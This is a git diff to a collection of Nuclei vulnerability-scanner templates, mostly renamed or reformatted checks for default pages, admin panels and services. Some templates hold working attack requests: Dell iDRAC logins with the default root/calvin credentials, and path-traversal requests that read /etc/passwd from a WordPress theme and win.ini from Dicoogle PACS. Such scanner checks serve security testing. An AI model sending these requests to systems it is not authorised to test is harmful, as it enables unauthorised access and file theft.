- matchers:
- - type: word
- words:
- - "Web Server's Default Page"
- part: body
diff --git a/nuclei-templates/Other/default-redhat-test-page-6902.yaml b/nuclei-templates/Other/default-redhat-test-page-6902.yaml
deleted file mode 100644
index 05ebbdd3f4..0000000000
--- a/nuclei-templates/Other/default-redhat-test-page-6902.yaml
+++ /dev/null
@@ -1,17 +0,0 @@
-id: default-redhat-test-page
-info:
- name: Red Hat Enterprise Linux Test Page
- author: dhiyaneshDk
- severity: info
- metadata:
- shodan-query: http.title:"Test Page for the Apache HTTP Server on Red Hat Enterprise Linux"
- tags: tech,redhat
-requests:
- - method: GET
- path:
- - '{{BaseURL}}'
- matchers:
- - type: word
- words:
- - "Test Page for the Apache HTTP Server on Red Hat Enterprise Linux"
- part: body
diff --git a/nuclei-templates/Other/default-redhat-test-page.yaml b/nuclei-templates/Other/default-redhat-test-page.yaml
new file mode 100644
index 0000000000..b46474eadd
--- /dev/null
+++ b/nuclei-templates/Other/default-redhat-test-page.yaml
@@ -0,0 +1,17 @@
+id: default-redhat-test-page
+info:
+ name: Red Hat Enterprise Linux Test Page
+ author: dhiyaneshDk
+ severity: info
+ reference:
+ - https://www.shodan.io/search?query=http.title%3A%22Test+Page+for+the+Apache+HTTP+Server+on+Red+Hat+Enterprise+Linux%22
+ tags: tech,redhat
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+ matchers:
+ - type: word
+ words:
+ - "Test Page for the Apache HTTP Server on Red Hat Enterprise Linux"
+ part: body
diff --git a/nuclei-templates/Other/default-ssltls-test-page-6908.yaml b/nuclei-templates/Other/default-ssltls-test-page-6908.yaml
deleted file mode 100644
index 5110d71023..0000000000
--- a/nuclei-templates/Other/default-ssltls-test-page-6908.yaml
+++ /dev/null
@@ -1,18 +0,0 @@
-id: default-ssltls-test-page
-
-info:
- name: SSL/TLS-aware Test Page
- author: dhiyaneshDk
- severity: info
- tags: tech,ssltls
- reference: https://www.shodan.io/search?query=http.title%3A%22Test+Page+for+the+SSL%2FTLS-aware+Apache+Installation+on+Web+Site%22&page=2
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}'
- matchers:
- - type: word
- words:
- - "Test Page for the SSL/TLS-aware Apache Installation on Web Site"
- part: body
diff --git a/nuclei-templates/Other/default-ssltls-test-page.yaml b/nuclei-templates/Other/default-ssltls-test-page.yaml
new file mode 100644
index 0000000000..a4eecdb047
--- /dev/null
+++ b/nuclei-templates/Other/default-ssltls-test-page.yaml
@@ -0,0 +1,17 @@
+id: default-ssltls-test-page
+info:
+ name: SSL/TLS-aware Test Page
+ author: dhiyaneshDk
+ severity: info
+ reference:
+ - https://www.shodan.io/search?query=http.title%3A%22Test+Page+for+the+SSL%2FTLS-aware+Apache+Installation+on+Web+Site%22&page=2
+ tags: tech,ssltls
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+ matchers:
+ - type: word
+ words:
+ - "Test Page for the SSL/TLS-aware Apache Installation on Web Site"
+ part: body
diff --git a/nuclei-templates/Other/default-tomcat-page.yaml b/nuclei-templates/Other/default-tomcat-page-6911.yaml
similarity index 100%
rename from nuclei-templates/Other/default-tomcat-page.yaml
rename to nuclei-templates/Other/default-tomcat-page-6911.yaml
diff --git a/nuclei-templates/Other/default-windows-server-page-6912.yaml b/nuclei-templates/Other/default-windows-server-page-6912.yaml
deleted file mode 100644
index cf96869059..0000000000
--- a/nuclei-templates/Other/default-windows-server-page-6912.yaml
+++ /dev/null
@@ -1,17 +0,0 @@
-id: default-windows-server-page
-info:
- name: IIS Windows Server Default Page
- author: dhiyaneshDk
- severity: info
- metadata:
- shodan-query: http.title:"IIS Windows Server"
- tags: tech,windows,iis
-requests:
- - method: GET
- path:
- - '{{BaseURL}}'
- matchers:
- - type: word
- words:
- - "IIS Windows Server"
- part: body
diff --git a/nuclei-templates/Other/default-windows-server-page-6913.yaml b/nuclei-templates/Other/default-windows-server-page-6913.yaml
new file mode 100644
index 0000000000..fd6f6ecba8
--- /dev/null
+++ b/nuclei-templates/Other/default-windows-server-page-6913.yaml
@@ -0,0 +1,18 @@
+id: default-windows-server-page
+
+info:
+ name: IIS Windows Server Default Page
+ author: dhiyaneshDk
+ severity: info
+ tags: tech,windows,iis
+ reference: https://www.shodan.io/search?query=http.title%3A%22IIS+Windows+Server%22
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+ matchers:
+ - type: word
+ words:
+ - "IIS Windows Server"
+ part: body
diff --git a/nuclei-templates/Other/dejavu.yaml b/nuclei-templates/Other/dejavu.yaml
new file mode 100644
index 0000000000..ee5eb0aebe
--- /dev/null
+++ b/nuclei-templates/Other/dejavu.yaml
@@ -0,0 +1,58 @@
+id: dejavu
+
+info:
+ name: >
+ DejaVu <= 2.4 - Arbitrary File Download
+ author: topscoder
+ severity: critical
+ description: >
+ The DejaVu Theme for WordPress is vulnerable to Arbitrary File Download in versions up to, and including, 2.4. This is due to the '_mysite_download_skin' parameter in the 'dl-skin.php' file. This makes it possible for unauthenticated attackers to download any file within the server of the vulnerable service.
+ reference:
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/2591af6b-e057-4c17-aeba-5c31efbae622?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
+ cvss-score: 9.1
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/themes/dejavu/"
+ google-query: inurl:"/wp-content/themes/dejavu/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-theme,dejavu,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/dejavu/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "dejavu"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.4')
\ No newline at end of file
diff --git a/nuclei-templates/Other/dell-idrac-default-login-6943.yaml b/nuclei-templates/Other/dell-idrac-default-login-6943.yaml
deleted file mode 100644
index 04db5754e0..0000000000
--- a/nuclei-templates/Other/dell-idrac-default-login-6943.yaml
+++ /dev/null
@@ -1,24 +0,0 @@
-id: dell-idrac-default-login
-info:
- name: Dell iDRAC6/7/8 Default login
- author: kophjager007
- severity: high
- tags: dell,idrac,default-login
-requests:
- - method: POST
- cookie-reuse: true
- path:
- - "{{BaseURL}}/data/login"
- body: "user=root&password=calvin"
- headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
- Content-Type: application/x-www-form-urlencode
- Referer: "{{BaseURL}}/login.html"
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- words:
- - 0
diff --git a/nuclei-templates/Other/dell-idrac-default-login-6946.yaml b/nuclei-templates/Other/dell-idrac-default-login-6946.yaml
new file mode 100644
index 0000000000..09fa2b2673
--- /dev/null
+++ b/nuclei-templates/Other/dell-idrac-default-login-6946.yaml
@@ -0,0 +1,31 @@
+id: dell-idrac-default-login
+info:
+ name: Dell iDRAC6/7/8 Default login
+ author: kophjager007
+ severity: high
+ tags: dell,idrac,default-login
+requests:
+ - raw:
+ - |
+ POST /data/login HTTP/1.1
+ Host: {{Hostname}}
+
+ user={{username}}&password={{password}}
+ payloads:
+ username:
+ - root
+ password:
+ - calvin
+ attack: pitchfork
+ headers:
+ Content-Type: "application/x-www-form-urlencode"
+ Referer: "{{BaseURL}}/login.html"
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - '0'
diff --git a/nuclei-templates/Other/dell-idrac-workflow.yaml b/nuclei-templates/Other/dell-idrac-workflow-6947.yaml
similarity index 100%
rename from nuclei-templates/Other/dell-idrac-workflow.yaml
rename to nuclei-templates/Other/dell-idrac-workflow-6947.yaml
diff --git a/nuclei-templates/Other/dell-idrac6-detect-6918.yaml b/nuclei-templates/Other/dell-idrac6-detect-6918.yaml
deleted file mode 100644
index 3a52fd5ad5..0000000000
--- a/nuclei-templates/Other/dell-idrac6-detect-6918.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: dell-idrac6-detect
-info:
- name: Detect Dell iDRAC6
- author: kophjager007
- description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers.
- severity: info
- tags: tech,dell
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/data?get=prodServerGen"
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- part: body
- words:
- - "11G"
- extractors:
- - type: regex
- part: body
- regex:
- - '[0-9]{2}G'
diff --git a/nuclei-templates/Other/dell-idrac6-detect.yaml b/nuclei-templates/Other/dell-idrac6-detect.yaml
new file mode 100644
index 0000000000..ebca549e38
--- /dev/null
+++ b/nuclei-templates/Other/dell-idrac6-detect.yaml
@@ -0,0 +1,25 @@
+id: dell-idrac6-detect
+info:
+ name: Detect Dell iDRAC6
+ author: kophjager007
+ severity: info
+ description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers.
+ tags: tech,dell
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/data?get=prodServerGen"
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ part: body
+ words:
+ - "11G"
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - '[0-9]{2}G'
diff --git a/nuclei-templates/Other/dell-idrac7-detect-6922.yaml b/nuclei-templates/Other/dell-idrac7-detect-6922.yaml
deleted file mode 100644
index 29b043ae56..0000000000
--- a/nuclei-templates/Other/dell-idrac7-detect-6922.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: dell-idrac7-detect
-info:
- name: Detect Dell iDRAC7
- author: kophjager007
- severity: info
- description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers.
- tags: tech,dell
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/data?get=prodServerGen"
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- part: body
- words:
- - "12G"
- extractors:
- - type: regex
- part: body
- regex:
- - '[0-9]{2}G'
diff --git a/nuclei-templates/Other/dell-idrac7-detect-6924.yaml b/nuclei-templates/Other/dell-idrac7-detect-6924.yaml
new file mode 100644
index 0000000000..f11ad8b32e
--- /dev/null
+++ b/nuclei-templates/Other/dell-idrac7-detect-6924.yaml
@@ -0,0 +1,29 @@
+id: dell-idrac7-detect
+info:
+ name: Detect Dell iDRAC7
+ author: kophjager007
+ description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers.
+ severity: info
+
+requests:
+ - method: GET
+ headers:
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
+ path:
+ - "{{BaseURL}}/data?get=prodServerGen"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ part: body
+ words:
+ - "12G"
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - '[0-9]{2}G'
\ No newline at end of file
diff --git a/nuclei-templates/Other/dell-idrac8-detect-6928.yaml b/nuclei-templates/Other/dell-idrac8-detect-6927.yaml
similarity index 100%
rename from nuclei-templates/Other/dell-idrac8-detect-6928.yaml
rename to nuclei-templates/Other/dell-idrac8-detect-6927.yaml
diff --git a/nuclei-templates/Other/dell-idrac9-default-login-6930.yaml b/nuclei-templates/Other/dell-idrac9-default-login-6930.yaml
deleted file mode 100644
index d60325405b..0000000000
--- a/nuclei-templates/Other/dell-idrac9-default-login-6930.yaml
+++ /dev/null
@@ -1,35 +0,0 @@
-id: dell-idrac9-default-login
-
-info:
- name: DELL iDRAC9 Default Login
- author: kophjager007,milo2012
- severity: high
- tags: dell,idrac,default-login
-
-requests:
- - raw:
- - |
- POST /sysmgmt/2015/bmc/session HTTP/1.1
- Host: {{Hostname}}
- User: "{{username}}"
- Password: "{{password}}"
-
- payloads:
- username:
- - root
- password:
- - calvin
- attack: pitchfork
-
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 201
- - 200
- condition: or
-
- - type: word
- part: body
- words:
- - '"authResult":0'
diff --git a/nuclei-templates/Other/dell-idrac9-default-login-6934.yaml b/nuclei-templates/Other/dell-idrac9-default-login-6934.yaml
new file mode 100644
index 0000000000..9317d085ee
--- /dev/null
+++ b/nuclei-templates/Other/dell-idrac9-default-login-6934.yaml
@@ -0,0 +1,30 @@
+id: dell-idrac9-default-login
+info:
+ name: DELL iDRAC9 Default Login
+ author: kophjager007,milo2012
+ severity: high
+ tags: dell,idrac,default-login
+requests:
+ - raw:
+ - |
+ POST /sysmgmt/2015/bmc/session HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0
+ Accept: application/json, text/plain, */*
+ Accept-Language: en-US,en;q=0.5
+ Accept-Encoding: gzip, deflate
+ User: "root"
+ Password: "calvin"
+ Content-Length: 0
+ Connection: close
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 201
+ - 200
+ condition: or
+ - type: word
+ part: body
+ words:
+ - '"authResult":0'
diff --git a/nuclei-templates/Other/dell-idrac9-detect-6936.yaml b/nuclei-templates/Other/dell-idrac9-detect-6936.yaml
deleted file mode 100644
index 5cc01bacca..0000000000
--- a/nuclei-templates/Other/dell-idrac9-detect-6936.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: dell-idrac9-detect
-info:
- name: Detect Dell iDRAC9
- author: kophjager007
- severity: info
- description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers.
- tags: tech,dell
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/sysmgmt/2015/bmc/info" # Firmware Version and other info (iDRAC9)
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- words:
- - "BuildVersion"
- - "SystemModelName"
- extractors:
- - type: regex
- part: body
- regex:
- - '[0-9]{2}G'
- - type: regex
- part: body
- group: 1
- regex:
- - '"FwVer" *: *"([^"]+)"'
diff --git a/nuclei-templates/Other/dell-idrac9-detect-6939.yaml b/nuclei-templates/Other/dell-idrac9-detect-6939.yaml
new file mode 100644
index 0000000000..f339b04905
--- /dev/null
+++ b/nuclei-templates/Other/dell-idrac9-detect-6939.yaml
@@ -0,0 +1,35 @@
+id: dell-idrac9-detect
+
+info:
+ name: Detect Dell iDRAC9
+ author: kophjager007
+ description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers.
+ severity: info
+ tags: tech,dell
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/sysmgmt/2015/bmc/info" # Firmware Version and other info (iDRAC9)
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ part: all
+ words:
+ - "14G"
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - '[0-9]{2}G'
+ - type: regex
+ part: body
+ name: fwver
+ group: 1
+ regex:
+ - '"FwVer" *: *"([^"]+)"'
diff --git a/nuclei-templates/Other/dell-openmanager-login-6948.yaml b/nuclei-templates/Other/dell-openmanager-login-6948.yaml
new file mode 100644
index 0000000000..069e116b8c
--- /dev/null
+++ b/nuclei-templates/Other/dell-openmanager-login-6948.yaml
@@ -0,0 +1,23 @@
+id: dell-openmanager-login
+info:
+ name: Dell OpenManage Switch Administrator
+ author: dhiyaneshDK
+ severity: info
+ reference:
+ - https://www.shodan.io/search?query=html%3A%22Dell+OpenManage+Switch+Administrator%22
+ tags: panel,dell
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+ - '{{BaseURL}}/config/authentication_page.htm'
+ matchers-condition: or
+ matchers:
+ - type: word
+ words:
+ - 'Dell OpenManage Switch Administrator'
+ - type: word
+ words:
+ - 'Log In'
+ - 'device/logOff_up_menu1.htm'
+ condition: and
diff --git a/nuclei-templates/Other/dell-openmanager-login-6949.yaml b/nuclei-templates/Other/dell-openmanager-login-6949.yaml
deleted file mode 100644
index 9730b557ef..0000000000
--- a/nuclei-templates/Other/dell-openmanager-login-6949.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-id: dell-openmanager-login
-
-info:
- name: Dell OpenManage Switch Administrator
- author: dhiyaneshDK
- severity: info
- reference: https://www.shodan.io/search?query=html%3A%22Dell+OpenManage+Switch+Administrator%22
- tags: panel,dell
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}'
- - '{{BaseURL}}/config/authentication_page.htm'
-
- matchers-condition: or
- matchers:
- - type: word
- words:
- - 'Dell OpenManage Switch Administrator'
-
- - type: word
- words:
- - 'Log In'
- - 'device/logOff_up_menu1.htm'
- condition: and
diff --git a/nuclei-templates/Other/deprecated-tls-6959.yaml b/nuclei-templates/Other/deprecated-tls-6959.yaml
index bfcd9696da..51a6f4e9b6 100644
--- a/nuclei-templates/Other/deprecated-tls-6959.yaml
+++ b/nuclei-templates/Other/deprecated-tls-6959.yaml
@@ -1,19 +1,21 @@
id: deprecated-tls
-
info:
- name: Deprecated TLS Detection (inferior to TLS 1.2)
+ name: Deprecated TLS Detection (TLS 1.1 or SSLv3)
author: righettod
severity: info
- reference: https://ssl-config.mozilla.org/#config=intermediate
+ reference:
+ - https://ssl-config.mozilla.org/#config=intermediate
+ description: |
+ Both TLS 1.1 and SSLv3 are deprecated in favor of stronger encryption.
+ remediation: |
+ Update the web server's TLS configuration to disable TLS 1.1 and SSLv3.
metadata:
shodan-query: ssl.version:sslv2 ssl.version:sslv3 ssl.version:tlsv1 ssl.version:tlsv1.1
tags: ssl
-
ssl:
- address: "{{Host}}:{{Port}}"
min_version: sslv3
max_version: tls11
-
extractors:
- type: json
json:
diff --git a/nuclei-templates/Other/dericam-login-6962.yaml b/nuclei-templates/Other/dericam-login-6960.yaml
similarity index 100%
rename from nuclei-templates/Other/dericam-login-6962.yaml
rename to nuclei-templates/Other/dericam-login-6960.yaml
diff --git a/nuclei-templates/Other/detect-addpac-voip-gateway-6963.yaml b/nuclei-templates/Other/detect-addpac-voip-gateway-6965.yaml
similarity index 100%
rename from nuclei-templates/Other/detect-addpac-voip-gateway-6963.yaml
rename to nuclei-templates/Other/detect-addpac-voip-gateway-6965.yaml
diff --git a/nuclei-templates/Other/detect-dangling-cname-6968.yaml b/nuclei-templates/Other/detect-dangling-cname-6966.yaml
similarity index 100%
rename from nuclei-templates/Other/detect-dangling-cname-6968.yaml
rename to nuclei-templates/Other/detect-dangling-cname-6966.yaml
diff --git a/nuclei-templates/Other/detect-dns-over-https-6969.yaml b/nuclei-templates/Other/detect-dns-over-https.yaml
similarity index 100%
rename from nuclei-templates/Other/detect-dns-over-https-6969.yaml
rename to nuclei-templates/Other/detect-dns-over-https.yaml
diff --git a/nuclei-templates/Other/detect-drone-config-6973.yaml b/nuclei-templates/Other/detect-drone-config-6973.yaml
new file mode 100644
index 0000000000..55c98c199f
--- /dev/null
+++ b/nuclei-templates/Other/detect-drone-config-6973.yaml
@@ -0,0 +1,26 @@
+id: detect-drone-config
+info:
+ name: Drone - Configuration Detection
+ author: geeknik
+ severity: high
+ description: Drone configuration was discovered.
+ reference:
+ - https://github.com/drone/drone
+ tags: config,exposure,drone
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/.drone.yml"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "kind:"
+ - "name:"
+ - "steps:"
+ condition: and
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/07/15
diff --git a/nuclei-templates/Other/detect-drone-config.yaml b/nuclei-templates/Other/detect-drone-config.yaml
deleted file mode 100644
index 1827e75380..0000000000
--- a/nuclei-templates/Other/detect-drone-config.yaml
+++ /dev/null
@@ -1,22 +0,0 @@
-id: detect-drone-config
-info:
- name: Detect Drone Configuration
- author: geeknik
- description: Drone is a Container-Native, Continuous Delivery Platform -- https://github.com/drone/drone
- severity: high
- tags: config,exposure,drone
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/.drone.yml"
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "kind:"
- - "name:"
- - "steps:"
- condition: and
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/Other/detect-jabber-xmpp-6974.yaml b/nuclei-templates/Other/detect-jabber-xmpp-6974.yaml
new file mode 100644
index 0000000000..0f6e392149
--- /dev/null
+++ b/nuclei-templates/Other/detect-jabber-xmpp-6974.yaml
@@ -0,0 +1,21 @@
+id: detect-jabber-xmpp
+info:
+ name: Detects Jabber XMPP Instance
+ author: geeknik
+ severity: info
+ description: Jabber is the original name of the Extensible Messaging and Presence Protocol (XMPP), the open technology for instant messaging and presence.
+ reference:
+ - https://datatracker.ietf.org/doc/html/rfc6120
+ tags: network,jabber,xmpp,messaging
+network:
+ - inputs:
+ - data: "a\n"
+ host:
+ - "{{Hostname}}"
+ - "{{Host}}:5222"
+ matchers:
+ - type: word
+ words:
+ - "stream:stream xmlns:stream"
+ - "stream:error xmlns:stream"
+ condition: or
diff --git a/nuclei-templates/Other/detect-jabber-xmpp.yaml b/nuclei-templates/Other/detect-jabber-xmpp.yaml
deleted file mode 100644
index fd3850ad2d..0000000000
--- a/nuclei-templates/Other/detect-jabber-xmpp.yaml
+++ /dev/null
@@ -1,20 +0,0 @@
-id: detect-jabber-xmpp
-info:
- name: Detects Jabber XMPP Instance
- author: geeknik
- severity: info
- description: Jabber is the original name of the Extensible Messaging and Presence Protocol (XMPP), the open technology for instant messaging and presence.
- reference: https://datatracker.ietf.org/doc/html/rfc6120
- tags: network,jabber,xmpp,messaging
-network:
- - inputs:
- - data: "a\n"
- host:
- - "{{Hostname}}"
- - "{{Host}}:5222"
- matchers:
- - type: word
- words:
- - "stream:stream xmlns:stream"
- - "stream:error xmlns:stream"
- condition: or
diff --git a/nuclei-templates/Other/detect-options-method-6976.yaml b/nuclei-templates/Other/detect-options-method-6976.yaml
index 2a0a126efc..dbeba332e1 100644
--- a/nuclei-templates/Other/detect-options-method-6976.yaml
+++ b/nuclei-templates/Other/detect-options-method-6976.yaml
@@ -4,7 +4,7 @@ info:
name: Detect enabled OPTIONS methods
author: pdteam
severity: info
- tags: misc,generic
+ tags: misc
requests:
- method: OPTIONS
diff --git a/nuclei-templates/Other/detect-rsyncd-6982.yaml b/nuclei-templates/Other/detect-rsyncd-6982.yaml
deleted file mode 100644
index 5dd5a819c5..0000000000
--- a/nuclei-templates/Other/detect-rsyncd-6982.yaml
+++ /dev/null
@@ -1,28 +0,0 @@
-id: detect-rsyncd
-
-info:
- name: Detect rsyncd
- reference: https://linux.die.net/man/1/rsync
- author: vsh00t,geeknik
- severity: info
- tags: network,rsyncd
-
-network:
- - inputs:
- - data: "?\r\n"
-
- host:
- - "{{Hostname}}"
- - "{{Host}}:873"
-
- matchers:
- - type: word
- words:
- - "RSYNCD: "
- - "ERROR: protocol startup error"
- condition: and
-
- extractors:
- - type: regex
- regex:
- - 'RSYNCD: \d\d.\d'
diff --git a/nuclei-templates/Other/detect-rsyncd.yaml b/nuclei-templates/Other/detect-rsyncd.yaml
new file mode 100644
index 0000000000..3083708997
--- /dev/null
+++ b/nuclei-templates/Other/detect-rsyncd.yaml
@@ -0,0 +1,28 @@
+id: detect-rsyncd
+
+info:
+ name: Detect rsyncd
+ reference: https://linux.die.net/man/1/rsync
+ author: vsh00t,geeknik
+ severity: info
+ tags: network,rsyncd
+
+network:
+ - inputs:
+ - data: "?\r\n"
+
+ host:
+ - "{{Hostname}}"
+ - "{{Hostname}}:873"
+
+ matchers:
+ - type: word
+ words:
+ - "RSYNCD: "
+ - "ERROR: protocol startup error"
+ condition: and
+
+ extractors:
+ - type: regex
+ regex:
+ - 'RSYNCD: \d\d.\d'
diff --git a/nuclei-templates/Other/detect-sentry-6983.yaml b/nuclei-templates/Other/detect-sentry-6983.yaml
deleted file mode 100644
index dadbcb0bfb..0000000000
--- a/nuclei-templates/Other/detect-sentry-6983.yaml
+++ /dev/null
@@ -1,21 +0,0 @@
-id: detect-sentry
-
-info:
- name: Detect Sentry Instance
- author: Sicksec
- severity: info
- tags: ssrf,sentry,tech
- reference:
- - https://hackerone.com/reports/374737
- - https://twitter.com/itsecurityguard/status/1127893545619218432?lang=en
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}"
-
- extractors:
- - type: regex
- part: body
- regex:
- - "https://[0-9a-f]*@[a-z0-9]+\\.[a-z.]+.?[0-9]+"
diff --git a/nuclei-templates/Other/detect-sentry.yaml b/nuclei-templates/Other/detect-sentry.yaml
new file mode 100644
index 0000000000..b6ab96f47f
--- /dev/null
+++ b/nuclei-templates/Other/detect-sentry.yaml
@@ -0,0 +1,18 @@
+id: detect-sentry
+info:
+ name: Detect Sentry Instance
+ author: Sicksec
+ severity: info
+ tags: ssrf,sentry,tech
+ reference:
+ - https://hackerone.com/reports/374737
+ - https://twitter.com/itsecurityguard/status/1127893545619218432?lang=en
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - "https://[0-9a-f]*@[a-z0-9]+\\.[a-z.]+.?[0-9]+"
diff --git a/nuclei-templates/Other/development-logs-6988.yaml b/nuclei-templates/Other/development-logs-6989.yaml
similarity index 100%
rename from nuclei-templates/Other/development-logs-6988.yaml
rename to nuclei-templates/Other/development-logs-6989.yaml
diff --git a/nuclei-templates/Other/diaowen-fileread.yaml b/nuclei-templates/Other/diaowen-fileread.yaml
index 50b042d23b..e81728524b 100644
--- a/nuclei-templates/Other/diaowen-fileread.yaml
+++ b/nuclei-templates/Other/diaowen-fileread.yaml
@@ -1,9 +1,11 @@
id: DIAOWEN-fileRead
+
info:
name: Dwsurvey 3.2 Arbitrary File Read
author: Str1am
severity: high
tags: DIAOWEN,fileRead
+
requests:
- method: GET
path:
diff --git a/nuclei-templates/Other/diarise-theme-lfi-6992.yaml b/nuclei-templates/Other/diarise-theme-lfi-6992.yaml
deleted file mode 100644
index 4934d58815..0000000000
--- a/nuclei-templates/Other/diarise-theme-lfi-6992.yaml
+++ /dev/null
@@ -1,22 +0,0 @@
-id: diarise-theme-lfi
-info:
- name: WordPress Diarise 1.5.9 Local File Disclosure
- author: 0x_Akoko
- severity: high
- description: WordPress Diarise theme version 1.5.9 suffers from a local file disclosure vulnerability.
- reference:
- - https://packetstormsecurity.com/files/152773/WordPress-Diarise-1.5.9-Local-File-Disclosure.html
- - https://cxsecurity.com/issue/WLB-2019050123
- tags: wordpress,wp-theme,lfi
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/wp-content/themes/diarise/download.php?calendar=file:///etc/passwd"
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:[x*]:0:0"
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/Other/dicoogle-pacs-lfi-6994.yaml b/nuclei-templates/Other/dicoogle-pacs-lfi-6994.yaml
deleted file mode 100644
index 84da5d8927..0000000000
--- a/nuclei-templates/Other/dicoogle-pacs-lfi-6994.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: dicoogle-pacs-lfi
-
-info:
- name: Dicoogle PACS 2.5.0 - Directory Traversal
- author: 0x_akoko
- severity: high
- description: In version 2.5.0, it is vulnerable to local file inclusion. This allows an attacker to read arbitrary files that the web user has access to. Admin credentials aren't required.
- reference:
- - https://cxsecurity.com/issue/WLB-2018070131
- - http://www.dicoogle.com/home
- tags: windows,lfi,dicoogle
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini"
-
- matchers:
- - type: word
- part: body
- words:
- - "bit app support"
- - "fonts"
- - "extensions"
- condition: and
diff --git a/nuclei-templates/Other/dicoogle-pacs-lfi.yaml b/nuclei-templates/Other/dicoogle-pacs-lfi.yaml
new file mode 100644
index 0000000000..d7e5ca13d2
--- /dev/null
+++ b/nuclei-templates/Other/dicoogle-pacs-lfi.yaml
@@ -0,0 +1,21 @@
+id: dicoogle-pacs-lfi
+info:
+ name: Dicoogle PACS 2.5.0 - Directory Traversal
+ author: 0x_akoko
+ severity: high
+ description: In version 2.5.0, it is vulnerable to local file inclusion. This allows an attacker to read arbitrary files that the web user has access to. Admin credentials aren't required.
+ reference: https://cxsecurity.com/issue/WLB-2018070131
+ tags: windows,lfi,dicoogle
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini"
+ stop-at-first-match: true
+ matchers:
+ - type: word
+ words:
+ - "bit app support"
+ - "fonts"
+ - "extensions"
+ condition: and
+ part: body
diff --git a/nuclei-templates/Other/Digital-Signage-rce.yaml b/nuclei-templates/Other/digital-signage-rce.yaml
similarity index 100%
rename from nuclei-templates/Other/Digital-Signage-rce.yaml
rename to nuclei-templates/Other/digital-signage-rce.yaml
